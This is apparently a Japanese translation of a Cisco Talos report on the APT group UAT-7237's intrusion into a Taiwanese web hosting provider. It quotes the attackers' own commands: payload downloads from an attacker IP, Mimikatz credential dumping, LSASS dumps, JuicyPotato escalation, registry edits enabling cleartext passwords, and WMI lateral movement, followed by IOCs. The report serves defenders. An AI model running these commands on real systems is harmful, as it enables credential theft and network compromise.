- Cisco Talos は、中国系の Advanced Persistent Threat(APT)グループである UAT-7237 の存在を確認しました。同グループは遅くとも 2022 年から活動しており、UAT-5918 とかなり共通する部分があります。
- UAT-7237 は最近、台湾の Web インフラ事業者を標的に不正侵入を行いました。オープンソースのツールを主に使用しています。ツールがある程度カスタマイズされていることから、検出を回避し、侵入先の企業での悪意のある活動を容易にすることが狙いだと考えられます。
- UAT-7237 は、価値の高い被害者環境で長期の永続化を確立しようとします。
- Talos は、UAT-7237 が攻撃手段としてカスタムのシェルコードローダーを使用していることも確認しました。Talos が「SoundBill」として追跡しているこのローダーは、Cobalt Strike を含む任意のシェルコードを復号して読み込むために使用されます。
Talos は、UAT-7237 が中国系の APT グループであり、台湾の Web インフラ事業者への不正侵入と長期的な永続化の確立に重点を置いていると高い確度で評価しています。UAT-7237 が使用するツールの多くは、ある程度カスタマイズされたオープンソースツールであり、その中には Talos が「SoundBill」として追跡しているカスタムのシェルコードローダーも含まれています。
Talos はさらに、UAT-7237 は UAT-5918 のサブグループであり、同じ攻撃グループの傘下で活動しているとみています。UAT-7237 のツール、攻撃対象、活動時期には、UAT-5918 とかなりの共通点があります。加えて、どちらの脅威グループも、中国語を第一言語として使用し、ツールの開発、カスタマイズ、運用を行っています。
Talos は UAT-7237 を UAT-5918 のサブグループとみていますが、UAT-7237 の戦術、手法、手順(TTP)には次のようにいくつかの相違点が認められるため、別の攻撃グループとして区別する必要があります。
- UAT-7237 は主要なバックドアインプラントとして Cobalt Strike を主に使用するのに対し、UAT-5918 は Meterpreter ベースのリバースシェルを主に使用します。
- UAT-5918 は通常、侵入に成功すると多数の Web シェルを展開します。一方、UAT-7237 による Web シェルの展開は非常に選択的であり、ごく一部の侵害端末にのみ展開します。
- UAT-5918 は Web シェルをバックドアアクセスの主要な手段として使用しますが、UAT-7237 は同じ目的のために、Remote Desktop Protocol(RDP)による直接アクセスと SoftEther VPN クライアントの組み合わせを使用します。
最近の不正侵入事例では、UAT-7237 は台湾の Web ホスティングプロバイダーを侵害し、長期の永続化を確立しました。特に注目に値するのは、被害組織の VPN およびクラウドインフラへのアクセス取得に強い関心を示していた点です。UAT-7237 はオープンソースのツールとカスタマイズしたツールを使用して、企業内で複数の悪意のある操作を実行しました。具体的には、偵察、ログイン情報の抽出、カスタムマルウェアの展開、VPN クライアント経由のバックドアアクセスの確立、ネットワークスキャン、横展開です。
初期アクセスおよび偵察
UAT-7237 は、インターネットに公開されているパッチ未適用のサーバーに存在する既知の脆弱性をエクスプロイトして、初期アクセスを取得します。標的企業への侵入に成功すると、UAT-7237 は、他のステルス重視の APT と同様に、迅速にフィンガープリンティングを行い、標的に対して悪意のある行為を継続する価値があるかどうかを判断します。
偵察の内容は、内部ネットワークおよびインターネット上のリモートホストの特定です。
cmd /c nslookup <victim’s_domain> cmd /c systeminfo cmd /c curl cmd /c ping 8[.]8[.]8[.]8 cmd /c ping 141[.]164[.]50[.]141 // Attacker controlled remote server. cmd /c ping <victim’s_domain> cmd /c ipconfig /all
UAT-5918 はすぐに Web シェルを展開してバックドアアクセスを確立しますが、UAT-7237 はそれとは大きく異なり、SoftEther VPN クライアントを使用して(Flax Typhoon も同様)アクセスを永続化し、その後 RDP 経由でシステムにアクセスします。
cmd /c c:\temp\WM7Lite\download[.]exe hxxp[://]141[.]164[.]50[.]141/sdksdk608/win-x64[.]rar c:\temp\WM7Lite\1[.]rar
powershell (new-object System[.]Net[.]WebClient).DownloadFile('hxxp[://]141[.]164[.]50[.]141/sdksdk608/vpn[.]rar','C:\Windows\Temp\vmware-SYSTEM\vmtools[.]rar')
UAT-7237 は、初期アクセスの取得、偵察、VPN ベースのアクセスの確立を終えると、企業内の他のシステムに目を向け、横展開と悪意のある活動を行う準備を開始します。
cmd[.]exe /c cd /d "<remote_smb_share>"&net use cmd[.]exe /c cd /d "<remote_smb_share>"&dir \\<remote_smb_share>\c$\ cmd[.]exe /c cd /d "C:\"&net group "domain admins" /domain cmd[.]exe /c cd /d "C:\"&net group "domain controllers" /domain
UAT-7237 は環境寄生型バイナリ(LOLBin)に依存しているだけでなく、偵察や横展開の際には SharpWMI
や WMICmd などの Windows Management Instrumentation(WMI)ベースのツールも積極的に使用しています。
cmd[.]exe /c cd /d "C:\"&C:\ProgramData\dynatrace\sharpwmi[.]exe <IP> <user> <pass> cmd whoami cmd.exe /c cd /d "C:\DotNet\"&WMIcmd.exe wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c whoami wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c netstat -ano >c:\1.txt
SharpWMI と WMICmd は、いずれもリモートホスト上で WMI クエリを実行するために使用され、任意のコマンドとコードの実行を可能にします。
UAT-7237 は、次のような基本的な Windows コマンドを使用して、その後にアクセスしたシステムのフィンガープリントを行っていました。
cmd.exe /c systeminfo cmd.exe /c tasklist cmd.exe /c net1 user /domain cmd.exe /c whoami /priv cmd.exe /c quser
侵入後のツール使用と目的達成のための行動
SoundBill
侵入後、UAT-7237 は、カスタマイズしたツールとオープンソースのツールを各種展開し、感染端末上でさまざまなタスクを実行します。Talos は、UAT-7237 がカスタマイズしたツールの 1 つを「SoundBill」として追跡しています。SoundBill は「VTHello」をベースに開発されたもので、中国語で記述されたシェルコードローダーです。このツールは、ディスク上の「ptiti.txt」という名前のファイルを復号し、その結果得られるシェルコードを実行します。
SoundBill には 2 つの実行ファイルが埋め込まれている点も注目に値します。いずれも、もともとは中国のインスタント メッセージング ソフトウェアである QQ に由来するもので、スピアフィッシング攻撃におけるデコイ(おとり)ファイルとして使用されている可能性があります。
SoundBill のペイロード(シェルコード)は、たとえば Mimikatz のカスタマイズ実装など、さまざまなものが考えられます。
VTSB.exe privilege::debug sekurlsa::logonpasswords exit
感染したシステム上で、次のような任意のコマンドを実行するメカニズムである可能性もあります。
c:\temp\vtsb.exe -c whoami
さらに、UAT-7237 が情報窃取を目的として長期アクセスを確立するための、位置に依存しない Cobalt Strike ペイロードであることも想定されます。これまでに Talos が発見した SoundBill と互換性がある Cobalt Strike ビーコンは、HTTPS 経由でコマンドアンドコントロール(C2)サーバー cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1[.]on[.]aws と通信します。
JuicyPotato
UAT-7237 は、中国系の攻撃者の間で人気の特権昇格ツール JuicyPotato も使用しており、次のような複数のコマンドを端末上で実行します。
cmd.exe /c c:\hotfix\juicy2.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} -p whoami
設定変更
UAT-7237 は、数回にわたる不正侵入事例において、感染端末の Windows OS に設定変更を加えようと試みました。具体例としては、レジストリを介したユーザーアカウント制御(UAC)の制限の無効化などです。
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
また、クリアテキストパスワードの保存の有効化も試行していました。
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
さらに、UAT-7237 はコンポーネントサービス管理コンソールにもアクセスしていました。悪意のあるコンポーネントの権限を調整しようとしていたと思われます。
mmc comexp.msc
UAT-7237 によるログイン情報の探索
UAT-7237 は複数のメカニズム、主に Mimikatz を用いて、感染端末からログイン情報を抽出します。しかし、UAT-7237 は Mimikatz の使用方法を徐々に進化させており、検出を回避する手段として、SoundBill に組み込まれた Mimikatz インスタンスを使ってログイン情報を抽出していると考えられます。
| ファイル名/コマンド | ツール名 |
| abc.dll | Comsvcs.dll(LSASS プロセスのダンプに使用) |
| Fileless.exe | Mimikatz |
| VTSB.exe privilege::debug sekurlsa::logonpasswords exit | Mimikatz ペイロードを組み込んだ SoundBill |
さらに UAT-7237 は、レジストリとディスクを検索して、感染端末上の VNC ログイン情報と設定を取得しています。
reg query "HKCU\Software\ORL\WinVNC3\Password" dir c:\*vnc.ini /s /b
別のツール(おそらくオープンソース)が端末でのコマンド実行、具体的には BAT ファイルと別の実行ファイルの呼び出しに使用されています。この目的も、ログイン情報の抽出です。
cmd.exe /c C:\hotfix\invoketest.exe -cmd "cmd /c C:\hotfix\1.bat" cmd.exe /c C:\hotfix\invoketest.exe -cmd "cmd /c C:\hotfix\Project1.exe C:\hotfix\SSP.dll"
上記の「Project1[.]exe」は、GitHub 上の ssp_dump_lsass プロジェクトです。DLL ファイルを引数として受け取り、それを Local Security Authority Service(LSASS)プロセスに挿入し、その後、LSASS プロセスを BIN ファイルにダンプします。
BAT ファイルを介して同じログイン情報抽出プロセスを実行するために、JuicyPotato が使用される場合もあります。
cmd.exe /c c:\hotfix\juicy2.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} -p "c:\windows\system32\cmd.exe" -a "/c c:\hotfix\1.bat"
取得したプロセスダンプは次に、外部への持ち出しのためにアーカイブとして準備されます。
cmd.exe /c "c:\program files\7-Zip\7z.exe" a C:\hotfix\1.zip C:\hotfix\1.bin
企業内での横展開
UAT-7237 は、以下のネットワークスキャンツールを使用します。
FScan:IP サブネットに対してオープンポートをスキャンするネットワークスキャナツール。
fileless -h 10.30.111.1/24 -nopoc -t 20
SMB スキャン:特定の端末で SMB サービスに関する情報を特定。
smb_version 10.30.111.11 445
UAT-7237 は、アクセス可能なシステムを見つけるとすぐに、以前に抽出したログイン情報を使用して追加の偵察を行い、横展開を図ります。
cmd[.]exe /c netstat -ano |findstr 3389 cmd[.]exe /c nslookup <victim’s_subdomains> cmd[.]exe /c net use <IP>\ipc$ <pass> /user:<userid> cmd[.]exe /c dir \\<remote_system>\c$ cmd[.]exe /c net use \\<remote_system>\ipc$ /del
SoftEther VPN
SoftEther VPN クライアントをホストするリモートサーバーは、2 つのアーカイブで構成されていました。1 つのアーカイブには、クライアント実行ファイルと対応する設定が含まれており、もう 1 つには ELF(Executable and Linkable Format)ベースのサーバーバイナリが含まれていました。
SoftEther のアーティファクトを Talos で分析した結果、次のような UAT-7237 の TTP が判明しました。
- サーバーは 2022 年 9 月に作成され、最後に使用されたのは 2024 年 12 月でした。つまり、UAT-7237 は 2 年間にわたって SoftEther を使用していたと考えられます。
- UAT-7237 は、VPN クライアントの言語設定ファイルで、簡体字中国語を優先表示言語に指定していました。これは、攻撃者が中国語に堪能だったことを示唆しています。
カバレッジ
今回の脅威は、以下の製品で検出してブロックすることが可能です。
Cisco Secure Endpoint(旧 AMP for Endpoints)は、この記事で説明したマルウェアの実行を阻止するのに最適です。Cisco Secure Endpoint の無料トライアルはこちらからお申し込みください。
Cisco Secure Email(旧 E メールセキュリティ)は、攻撃の一環として攻撃者が送りつける不正な電子メールをブロックします。Cisco Secure Email の無料トライアルはこちらからお申し込みください。
Threat Defense Virtual、適応型セキュリティアプライアンス、Meraki MX など、Cisco Secure Firewall(旧次世代ファイアウォールおよび Firepower NGFW)アプライアンスは、この脅威に関連する悪意のあるアクティビティを検出できます。
Cisco Secure Network/Cloud Analytics(Stealthwatch/Stealthwatch Cloud)は、ネットワークトラフィックを自動的に分析し、接続されているすべてのデバイスで、望ましくない可能性があるアクティビティをユーザーに警告します。
Cisco Secure Malware Analytics(Threat Grid)は、悪意のあるバイナリを特定し、シスコのすべてのセキュリティ製品に保護機能を組み込みます。
Cisco Secure Access は、ゼロトラストの原則に基づいて構築された、最新のクラウド提供型セキュリティサービスエッジ(SSE)です。Cisco Secure Access はユーザーがどこで作業していても、インターネット、クラウドサービス、プライベート アプリケーションへのシームレスかつ透過的でセキュアなアクセスを提供します。Cisco Secure Access の無料トライアルにご興味をお持ちの場合は、シスコのアカウント担当者または認定パートナーまでお問い合わせください。
Umbrella(シスコのセキュア インターネット ゲートウェイ(SIG))は、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。
Cisco Secure Web Appliance(旧 Web セキュリティアプライアンス)は、危険性のあるサイトを自動的にブロックし、ユーザーがアクセスする前に疑わしいサイトを検査します。
特定の環境および脅威データに対する追加の保護機能は、Firewall Management Center から入手できます。
Cisco Duo は、ユーザーに多要素認証を提供し、承認されたユーザーのみがネットワークにアクセスできるようにします。
オープンソースの Snort サブスクライバルールセットをお使いであれば、Snort.org で購入可能な最新のルールパックをダウンロードすることで、最新状態を維持できます。
次の Snort ルールがこの脅威に対応しています。
- Snort v2:64908 ~ 64916
- Snort v3:301209 ~ 301212
IOC
この調査の IOC は、こちらの GitHub リポジトリでも提供しています。
450fa9029c59af9edf2126df1d6a657ee6eb024d0341b32e6f6bdb8dc04bae5a - C:\temp\wmiscan.exe 6a72e4b92d6a459fc2c6054e9ddb9819d04ed362bd847333492410b6d7bae5aa - c:/hotfix/Project1.exe - ssp_dump_lsass tool E106716a660c751e37cfc4f4fbf2ea2f833e92c2a49a0b3f40fc36ad77e0a044 - C:/hotfixlog/Fileless.exe - FScan B52bf5a644ae96807e6d846b0ce203611d83cc8a782badc68ac46c9616649477 - C:/hotfixlog/smb_version.exe 864e67f76ad0ce6d4cc83304af4347384c364ca6735df0797e4b1ff9519689c5 – fileless.exe - Mimikatz SoundBill Df8497b9c37b780d6b6904a24133131faed8ea4cf3d75830b53c25d41c5ea386 Cobalt Strike 0952e5409f39824b8a630881d585030a1d656db897adf228ce27dd9243db20b7 7a5f05da3739ad3e11414672d01b8bcf23503a9a8f1dd3f10ba2ead7745cdb1f cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1[.]on[.]aws http[://]141[.]164[.]50[.]141/sdksdk608/win-x64[.]rar 141[.]164[.]50[.]141
本稿は 2025 年 8 月 15 日にTalos Group
Authors